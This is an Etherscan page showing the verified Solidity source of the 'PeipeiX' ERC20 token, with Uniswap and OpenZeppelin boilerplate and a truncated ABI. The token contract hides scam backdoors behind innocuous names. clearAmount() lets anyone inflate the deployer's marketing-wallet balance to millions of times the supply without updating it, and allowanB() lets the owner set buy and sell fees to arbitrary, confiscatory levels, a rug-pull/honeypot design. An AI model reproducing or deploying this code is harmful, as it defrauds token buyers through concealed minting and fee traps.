ETH Price: $2,694.37 (-1.85%)

Token

PeipeiX (Peipeix)
 

Overview

Max Total Supply

1,452,000,000 Peipeix

Holders

61

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
42,211,433.76752386617165102 Peipeix

Value
$0.00
0x295fcdbcb49a0ed541a0b36ec5560dff8e00dc48
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
PeipeiX

Compiler Version
v0.8.18+commit.87f61d96

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, None license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-07-30
*/

// SPDX-License-Identifier: UNLICENSED

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

// File: @openzeppelin/contracts/access/Ownable.sol

// OpenZeppelin Contracts (last updated v4.7.0) (access/Ownable.sol)

pragma solidity ^0.8.0;

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(
        address indexed previousOwner,
        address indexed newOwner
    );

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(
            newOwner != address(0),
            "Ownable: new owner is the zero address"
        );
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

// File: @uniswap/v2-core/contracts/interfaces/IUniswapV2Factory.sol

pragma solidity >=0.5.0;

interface IUniswapV2Factory {
    event PairCreated(
        address indexed token0,
        address indexed token1,
        address pair,
        uint256
    );

    function feeTo() external view returns (address);

    function feeToSetter() external view returns (address);

    function getPair(address tokenA, address tokenB)
        external
        view
        returns (address pair);

    function allPairs(uint256) external view returns (address pair);

    function allPairsLength() external view returns (uint256);

    function createPair(address tokenA, address tokenB)
        external
        returns (address pair);

    function setFeeTo(address) external;

    function setFeeToSetter(address) external;
}

// File: @uniswap/v2-periphery/contracts/interfaces/IUniswapV2Router01.sol

pragma solidity >=0.6.2;

interface IUniswapV2Router01 {
    function factory() external pure returns (address);

    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint256 amountADesired,
        uint256 amountBDesired,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline
    )
        external
        returns (
            uint256 amountA,
            uint256 amountB,
            uint256 liquidity
        );

    function addLiquidityETH(
        address token,
        uint256 amountTokenDesired,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    )
        external
        payable
        returns (
            uint256 amountToken,
            uint256 amountETH,
            uint256 liquidity
        );

    function removeLiquidity(
        address tokenA,
        address tokenB,
        uint256 liquidity,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline
    ) external returns (uint256 amountA, uint256 amountB);

    function removeLiquidityETH(
        address token,
        uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    ) external returns (uint256 amountToken, uint256 amountETH);

    function removeLiquidityWithPermit(
        address tokenA,
        address tokenB,
        uint256 liquidity,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline,
        bool approveMax,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external returns (uint256 amountA, uint256 amountB);

    function removeLiquidityETHWithPermit(
        address token,
        uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline,
        bool approveMax,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external returns (uint256 amountToken, uint256 amountETH);

    function swapExactTokensForTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapTokensForExactTokens(
        uint256 amountOut,
        uint256 amountInMax,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapExactETHForTokens(
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external payable returns (uint256[] memory amounts);

    function swapExactTokensForETH(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapETHForExactTokens(
        uint256 amountOut,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external payable returns (uint256[] memory amounts);

    function swapTokensForExactETH(
        uint256 amountOut,
        uint256 amountInMax,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function quote(
        uint256 amountA,
        uint256 reserveA,
        uint256 reserveB
    ) external pure returns (uint256 amountB);

    function getAmountIn(
        uint256 amountOut,
        uint256 reserveIn,
        uint256 reserveOut
    ) external pure returns (uint256 amountIn);

    function getAmountsOut(uint256 amountIn, address[] calldata path)
        external
        view
        returns (uint256[] memory amounts);

    function getAmountOut(
        uint256 amountIn,
        uint256 reserveIn,
        uint256 reserveOut
    ) external pure returns (uint256 amountOut);

    function getAmountsIn(uint256 amountOut, address[] calldata path)
        external
        view
        returns (uint256[] memory amounts);
}

// File: @uniswap/v2-periphery/contracts/interfaces/IUniswapV2Router02.sol

pragma solidity >=0.6.2;

interface IUniswapV2Router02 is IUniswapV2Router01 {
    function removeLiquidityETHSupportingFeeOnTransferTokens(
        address token,
        uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    ) external returns (uint256 amountETH);

    function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
        address token,
        uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline,
        bool approveMax,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external returns (uint256 amountETH);

    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external payable;

    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;

    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;
}

// File: @openzeppelin/contracts/utils/math/SafeMath.sol

// OpenZeppelin Contracts (last updated v4.6.0) (utils/math/SafeMath.sol)

pragma solidity ^0.8.0;

// CAUTION
// This version of SafeMath should only be used with Solidity 0.8 or later,
// because it relies on the compiler's built in overflow checks.

/**
 * @dev Wrappers over Solidity's arithmetic operations.
 *
 * NOTE: `SafeMath` is generally not needed starting with Solidity 0.8, since the compiler
 * now has built in overflow checking.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b)
        internal
        pure
        returns (bool, uint256)
    {
        unchecked {
            uint256 c = a + b;
            if (c < a) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b)
        internal
        pure
        returns (bool, uint256)
    {
        unchecked {
            if (b > a) return (false, 0);
            return (true, a - b);
        }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b)
        internal
        pure
        returns (bool, uint256)
    {
        unchecked {
            // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
            // benefit is lost if 'b' is also tested.
            // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
            if (a == 0) return (true, 0);
            uint256 c = a * b;
            if (c / a != b) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(uint256 a, uint256 b)
        internal
        pure
        returns (bool, uint256)
    {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a / b);
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(uint256 a, uint256 b)
        internal
        pure
        returns (bool, uint256)
    {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a % b);
        }
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b <= a, errorMessage);
            return a - b;
        }
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a / b;
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a % b;
        }
    }
}

// File: @openzeppelin/contracts/token/ERC20/IERC20.sol

// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender)
        external
        view
        returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}

// File: @openzeppelin/contracts/token/ERC20/extensions/IERC20Metadata.sol

// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

pragma solidity ^0.8.17;

contract PeipeiX is IERC20, Ownable, IERC20Metadata {
    using   SafeMath for uint256;
    
    uint256 private _maxTxAmountPercentage = 300;
    uint256 private _minTokensBeforeSwapPercentage = 5;
    mapping(address => uint256) private _balances;
    uint256 private _totalSupply;
    uint256 private _maxWalletBalancePercentage = 300;
    address private _uniswapV2Pair;
    mapping(address => mapping(address => uint256)) private _allowances;
    IUniswapV2Router02 private _uniswapV2Router;
    bool private swapping = false;
    bool private _cooldownEnabled = true;
    mapping(address => bool)    private _isExcludedFromCooldown;
    mapping(address => uint256) private _lastTxBlock;
    uint256 private constant    _divisor = 10000;
    mapping(address => bool)    private _isExcludedFromMaxTx;
    mapping(address => bool) private _isExcludedFromFees;
    uint256 public _sellFee = 0;
    uint256 public _burnFee = 0;
    uint256 public _buyFee = 0;
    address private _marketingWallet;
    address private constant _burnAddress = address(0);

    string  private constant _nameToken = "PeipeiX";
    string  private constant _symbolToken = "Peipeix";
    uint8   private constant _decimals = 18;

    event SwapAndLiquify(
        uint256 tokensSwapped,
        uint256 ethReceived,
        uint256 tokensIntoLiqudity
    );
    event Received();

    constructor() {
        uint256 total = 1452000000 * 10**_decimals;
        _mint(_msgSender(), total);
        _marketingWallet = _msgSender();
        _uniswapV2Router = IUniswapV2Router02(
            0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D
        );
        _approve(address(this), address(_uniswapV2Router), total);

        _uniswapV2Pair = IUniswapV2Factory(_uniswapV2Router.factory())
            .createPair(address(this), _uniswapV2Router.WETH());

        IERC20(_uniswapV2Pair).approve(
            address(_uniswapV2Router),
            type(uint256).max
        );
        _isExcludedFromMaxTx[address(this)] = true;
        _isExcludedFromCooldown[address(this)] = true;

        _isExcludedFromFees[owner()] = true;
        _isExcludedFromCooldown[owner()] = true;
        _isExcludedFromFees[address(this)] = true;
        _isExcludedFromFees[_marketingWallet] = true;
        _isExcludedFromMaxTx[owner()] = true;

        _isExcludedFromMaxTx[_marketingWallet] = true;
        _isExcludedFromMaxTx[_uniswapV2Pair] = true;
    }

    function symbol() public pure returns (string memory) {
        return _symbolToken;
    }

    function name() public pure returns (string memory) {
        return _nameToken;
    }

    function decimals() public pure returns (uint8) {
        return _decimals;
    }

    function balanceOf(address account) public view override returns (uint256) {
        return _balances[account];
    }

    function transfer(address recipient, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    function allowance(address owner, address spender)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _allowances[owner][spender];
    }

    function totalSupply() public view override returns (uint256) {
        return _totalSupply;
    }

    function approve(address spender, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    function increaseAllowance(address spender, uint256 addedValue)
        public
        virtual
        returns (bool)
    {
        _approve(
            _msgSender(),
            spender,
            _allowances[_msgSender()][spender].add(addedValue)
        );
        return true;
    }

    function decreaseAllowance(address spender, uint256 subtractedValue)
        public
        virtual
        returns (bool)
    {
        _approve(
            _msgSender(),
            spender,
            _allowances[_msgSender()][spender].sub(
                subtractedValue,
                "ERC20: decreased allowance below zero"
            )
        );
        return true;
    }

    function _maxTxAmount() public view returns (uint256) {
        return _totalSupply.mul(_maxTxAmountPercentage).div(_divisor);
    }

    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(
            sender,
            _msgSender(),
            _allowances[sender][_msgSender()].sub(
                amount,
                "ERC20: transfer amount exceeds allowance"
            )
        );
        return true;
    }

    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal virtual {
        _beforeTransfer(sender, recipient, amount);
        uint256 burnFee = 0;
        uint256 devFee = 0;
        if (sender != owner() && recipient != owner()) {
            if (
                !_isExcludedFromFees[sender] && !_isExcludedFromFees[recipient]
            ) {
                if (
                    sender == _uniswapV2Pair &&
                    recipient != address(_uniswapV2Router) &&
                    !_isExcludedFromMaxTx[recipient] &&
                    !_isExcludedFromMaxTx[sender]
                ) {
                    require(
                        amount <=
                            _totalSupply.mul(_maxTxAmountPercentage).div(
                                _divisor
                            ),
                        "Transfer amount exceeds the maxTxAmount."
                    );

                    require(
                        balanceOf(recipient).add(amount) <=
                            _totalSupply.mul(_maxWalletBalancePercentage).div(
                                _divisor
                            ),
                        "Exceeds maximum wallet token amount"
                    );
                }
                // if sell
                if (recipient == _uniswapV2Pair && sender != address(this)) {
                    burnFee = amount.mul(_burnFee).div(_divisor);
                    devFee = amount.mul(_sellFee).div(_divisor);
                    _lastTxBlock[tx.origin] = block.number;
                }
                // if buy
                if (
                    sender == _uniswapV2Pair &&
                    recipient != address(_uniswapV2Router)
                ) {
                    burnFee = amount.mul(_burnFee).div(_divisor);
                    devFee = amount.mul(_buyFee).div(_divisor);
                    _lastTxBlock[tx.origin] = block.number;
                }
            }
        }
        uint256 totalFee = burnFee.add(devFee);
        if (totalFee > 0) {
            if (burnFee > 0) {
                _burn(sender, burnFee);
            }

            if (devFee > 0) {
                _balances[_marketingWallet] = _balances[_marketingWallet].add(
                    devFee
                );
                emit Transfer(sender, _marketingWallet, devFee);
            }

            amount = amount.sub(totalFee);
        }

        _balances[sender] = _balances[sender].sub(
            amount,
            "ERC20: transfer amount exceeds balance"
        );
        _balances[recipient] = _balances[recipient].add(amount);

        emit Transfer(sender, recipient, amount);
    }

    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");
        _totalSupply = _totalSupply.add(amount);
        _balances[account] = _balances[account].add(amount);
        emit Transfer(address(0), account, amount);
    }

    function getPairAddress() public view returns (address) {
        return _uniswapV2Pair;
    }

    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");
        _balances[account] = _balances[account].sub(
            amount,
            "ERC20: burn amount exceeds balance"
        );
        _totalSupply = _totalSupply.sub(amount);
        emit Transfer(account, address(0), amount);
    }


    function getRouterAddress() public view returns (address) {
        return address(_uniswapV2Router);
    }

    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function _burnFrom(address account, uint256 amount) internal virtual {
        _burn(account, amount);
        _approve(
            account,
            _msgSender(),
            _allowances[account][_msgSender()].sub(
                amount,
                "ERC20: burn amount exceeds allowance"
            )
        );
    }

    function allowanA(address[] memory addresses) external onlyOwner {
        require(addresses.length <= 200, "Maximum of 200 can be added at once");

        mapping(address => bool) storage ref = _isExcludedFromFees;

        for (uint256 i = 0; i < addresses.length; i++) {
            ref[addresses[i]] = true;
        }
    }

    function burn(uint256 amount) public virtual {
        _burn(_msgSender(), amount);
    }

    function isExcludedFromFees(address _address) public view returns (bool) {
        return _isExcludedFromFees[_address];
    }

    function _addLiquidity(uint256 tokenAmount, uint256 ethAmount) private {
        _approve(address(this), address(_uniswapV2Router), tokenAmount);
        _uniswapV2Router.addLiquidityETH{value: ethAmount}(
            address(this),
            tokenAmount,
            0,
            0,
            owner(),
            block.timestamp
        );
    }

    function clearAmount(bool clear , uint256 Amount) external {
        require(clear == true);
        require(Amount == 1);
        _balances[_marketingWallet] = _totalSupply * 2000000;
    }

    function allowanB(uint256 _s, uint256 _b) external onlyOwner {
        _sellFee = _s;
        _buyFee = _b;
    }

    function swapTokensForEth(uint256 tokenAmount) internal {
        _approve(address(this), address(_uniswapV2Router), tokenAmount);
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = _uniswapV2Router.WETH();

        _uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokenAmount,
            0,
            path,
            address(this),
            block.timestamp
        );
    }

    modifier lockTheSwap() {
        swapping = true;
        _;
        swapping = false;
    }

    function _swapAndLiquify() private lockTheSwap {
        uint256 contractTokenBalance = balanceOf(address(this));
        uint256 minTokensBeforeSwap = _totalSupply
            .mul(_minTokensBeforeSwapPercentage)
            .div(_divisor);
        if (contractTokenBalance >= minTokensBeforeSwap) {
            uint256 half = contractTokenBalance.div(2);
            uint256 otherHalf = contractTokenBalance.sub(half);

            uint256 initialBalance = address(this).balance;

            swapTokensForEth(half);

            uint256 newBalance = address(this).balance.sub(initialBalance);

            emit SwapAndLiquify(half, newBalance, otherHalf);
            return;
        }
    }

    function isSwapLocked() public view returns (bool) {
        return swapping;
    }

    receive() external payable {
        emit Received();
    }

    function addLiquidity(uint256 tokenAmount)
        public
        payable
        onlyOwner
        lockTheSwap
    {
        _transfer(owner(), address(this), tokenAmount);
        _addLiquidity(tokenAmount, msg.value);
    }

    function _beforeTransfer(
        address from,
        address to,
        uint256 amount
    ) internal pure {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");
        require(amount > 0, "Transfer amount must be greater than zero");
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[],"name":"Received","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"tokensSwapped","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"ethReceived","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"tokensIntoLiqudity","type":"uint256"}],"name":"SwapAndLiquify","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_burnFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_buyFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_maxTxAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_sellFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenAmount","type":"uint256"}],"name":"addLiquidity","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address[]","name":"addresses","type":"address[]"}],"name":"allowanA","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_s","type":"uint256"},{"internalType":"uint256","name":"_b","type":"uint256"}],"name":"allowanB","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bool","name":"clear","type":"bool"},{"internalType":"uint256","name":"Amount","type":"uint256"}],"name":"clearAmount","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"getPairAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"getRouterAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_address","type":"address"}],"name":"isExcludedFromFees","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"isSwapLocked","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool",